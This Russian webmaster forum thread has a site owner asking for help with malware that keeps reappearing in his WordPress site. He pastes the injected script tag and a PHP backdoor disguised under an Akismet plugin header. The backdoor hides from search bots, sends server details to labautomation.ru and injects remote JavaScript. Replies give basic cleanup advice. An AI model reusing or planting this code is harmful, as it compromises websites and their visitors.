X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Взламывают сайты Яндекс орет что на, сайте вирус
GuN
GuN
Topic Starter сообщение 29.11.2014, 9:43; Ответить: GuN
Сообщение #1


Частый гость
**


Группа: User
Сообщений: 93
Регистрация: 7.10.2010
Поблагодарили: 5 раз
Репутация:   0  


Доброго всем дня. Уже менсяц борюсь с этой заразой!! Может кто сталкивался прошу помочь :( незнаю что делать уже.


это вставка пстоянно всталяеться в котент вирус часть первая
--------------------------------------------------------------------
<!--b7bb54--><script type="text/javascript" src="http://labautomation.ru/jbkw2ybt.php?id=4477416"></script><!--/b7bb54-->
---------------------------------------------------------------------

эта вставка которая вставляеться в idex.php тему сайта! Я что только не делал, выствлял прова доступа на фаилы 444 всеровно меняет и всталяет эту дрянь! Менял пароли везде. Не помогает. Может укого что то было подобное как это победить???? :facepalm:

эта вставка которая вставляеться в idex.php тему сайта, часть вторая!
---------------------------------------------------------------------
<?php
#395547#
/**

* @package Akismet

*/

/*

Plugin Name: Akismet

Plugin URI: http://akismet.com/

Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/">Sign up for an Akismet API key</a>, and 3) Go to your Akismet configuration page, and save your API key.

Version: 3.0.0

Author: Automattic

Author URI: http://automattic.com/wordpress-plugins/

License: GPLv2 or later

Text Domain: akismet

*/



/*

This program is free software; you can redistribute it and/or

modify it under the terms of the GNU General Public License

as published by the Free Software Foundation; either version 2

of the License, or (at your option) any later version.



This program is distributed in the hope that it will be useful,

but WITHOUT ANY WARRANTY; without even the implied warranty of

MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the

GNU General Public License for more details.



You should have received a copy of the GNU General Public License

along with this program; if not, write to the Free Software

Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

*/



if( empty( $rr ) ) {

if( ( substr( trim( $_SERVER['REMOTE_ADDR'] ), 0, 6 ) == '74.125' ) || preg_match(

"/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i",

$_SERVER['HTTP_USER_AGENT']

)

) {

} else {

error_reporting( 0 );

@ini_set( 'display_errors', 0 );

if( !function_exists( '__url_get_contents' ) ) {

function __url_get_contents( $remote_url, $timeout )

{

if( function_exists( 'curl_exec' ) ) {

$ch = curl_init();

curl_setopt( $ch, CURLOPT_URL, $remote_url );

curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );

curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT, $timeout );

curl_setopt( $ch, CURLOPT_TIMEOUT, $timeout ); //timeout in seconds

$_url_get_contents_data = curl_exec( $ch );

curl_close( $ch );

} elseif( function_exists( 'file_get_contents' ) && ini_get( 'allow_url_fopen' ) ) {

$ctx = @stream_context_create(

array(

'http' =>

array(

'timeout' => $timeout,

)

)

);

$_url_get_contents_data = @file_get_contents( $remote_url, false, $ctx );

} elseif( function_exists( 'fopen' ) && function_exists( 'stream_get_contents' ) ) {

$handle = @fopen( $remote_url, "r" );

$_url_get_contents_data = @stream_get_contents( $handle );

} else {

$_url_get_contents_data = __file_get_url_contents( $remote_url );

}

return $_url_get_contents_data;

}

}



if( !function_exists( '__file_get_url_contents' ) ) {

function __file_get_url_contents( $remote_url )

{

if( preg_match(

'/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i',

$remote_url,

$matches

)

) {

$protocol = strtolower( $matches[1] );

$host = $matches[2];

$path = $matches[3];

} else {

// Bad remote_url-format

return false;

}

if( $protocol == "http" ) {

$socket = @fsockopen( $host, 80, $errno, $errstr, $timeout );

} else {

// Bad protocol

return false;

}

if( !$socket ) {

// Error creating socket

return false;

}

$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";

$len_written = @fwrite( $socket, $request );

if( $len_written === false || $len_written != strlen( $request ) ) {

// Error sending request

return false;

}

$response = "";

while( !@feof( $socket ) &&

( $buf = @fread( $socket, 4096 ) ) !== false ) {

$response .= $buf;

}

if( $buf === false ) {

// Error reading response

return false;

}

$end_of_header = strpos( $response, "\r\n\r\n" );

return substr( $response, $end_of_header + 4 );

}

}



$rr['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];

$rr['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];

$rr['HTTP_HOST'] = $_SERVER['HTTP_HOST'];

$rr['REDIRECT_STATUS'] = $_SERVER['REDIRECT_STATUS'];

$rr['SERVER_NAME'] = $_SERVER['SERVER_NAME'];

$rr['SERVER_ADDR'] = $_SERVER['SERVER_ADDR'];

$rr['SERVER_ADMIN'] = $_SERVER['SERVER_ADMIN'];



$rr = __url_get_contents("http://labautomation.ru/jbkw2ybt.php" . "?fid=318923&info=" . http_build_query( $rr ) . "&no=1", 1);

echo "<script type=\"text/javascript\" src=\"http://labautomation.ru/jbkw2ybt.php?id=4477447\"></script>";

}

}
#/395547#
?>
----------------------------------------------------------------------------

Сообщение отредактировал GuN - 29.11.2014, 9:46


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
FreeJabber
FreeJabber
сообщение 29.11.2014, 10:07; Ответить: FreeJabber
Сообщение #2


На Массе xD
******


Группа: Active User
Сообщений: 1727
Регистрация: 9.5.2011
Из: Москва
Поблагодарили: 674 раза
Репутация:   129  


Поле с кодом поместите в споллер, а то много места занимает.

Была такая же проблема ( первая часть)

Решил её путём нанятия специального человека.


--------------------
Куплю Ваши знания ( которые приносят деньги )

Писать в личку
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
seomasters
seomasters
сообщение 29.11.2014, 10:38; Ответить: seomasters
Сообщение #3


клоновод
*****

Группа: Banned
Сообщений: 701
Регистрация: 22.9.2011
Из: Россия, Крым
Поблагодарили: 245 раз
Репутация:   62  


Готов помочь обращайтесь!


--------------------
клоновод
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
kluben
kluben
сообщение 7.12.2014, 12:47; Ответить: kluben
Сообщение #4


Участник
***


Группа: User
Сообщений: 118
Регистрация: 23.8.2012
Поблагодарили: 18 раз
Репутация:   2  


Доступ по SSH закройте. Мне как-то помогло.
Да и сайт на каком движке?
есть смысл сменить хостера, заново установить обновленную (!) СМС и залить по новой базу. И доступ по SSH прикрыть.
Заново установить СМС это означает установка с нуля из архива взятого на оф сайте. А не перенос файлов от одного хостера к другому.
Тему то где для сайта брали? Скачали где-то? :)

Сообщение отредактировал kluben - 7.12.2014, 12:47
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Robust
Robust
сообщение 7.12.2014, 14:17; Ответить: Robust
Сообщение #5


Участник
***

Группа: User
Сообщений: 189
Регистрация: 17.9.2014
Из: Местный
Поблагодарили: 44 раза
Репутация:   2  


Похоже на WP. Сеопак не стоит случайно? Тема из паблика. Все это очень смахивает на шелл
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Увеличение посещаемости сайта (яндекс, гугл, соц сети) - реальные люди
13 SANR 771 Сегодня, 17:14
автор: anchous
Открытая тема (нет новых ответов) Мобильный «Яндекс.Диск» стал безлимитным
7 MissContent 979 Сегодня, 16:01
автор: RICHHost
Открытая тема (нет новых ответов) Как пройти модерацию в Яндекс Директ, тематика Майнеры криптовалюты
3 rownong27 1073 Сегодня, 15:59
автор: RICHHost
Открытая тема (нет новых ответов) Естественные ссылки в деталях. Что из себя представляют, как добывать
seoandme.ru - SEO-блог Анны Ященко
0 AnnaYa 259 Сегодня, 10:56
автор: AnnaYa
Открытая тема (нет новых ответов) Стоит ли подавать платную заявку в Яндекс Каталог для регионального издания?
11 DVORYAN 1605 Вчера, 17:48
автор: RICHHost


 



RSS Текстовая версия Сейчас: 12.12.2017, 18:22
Дизайн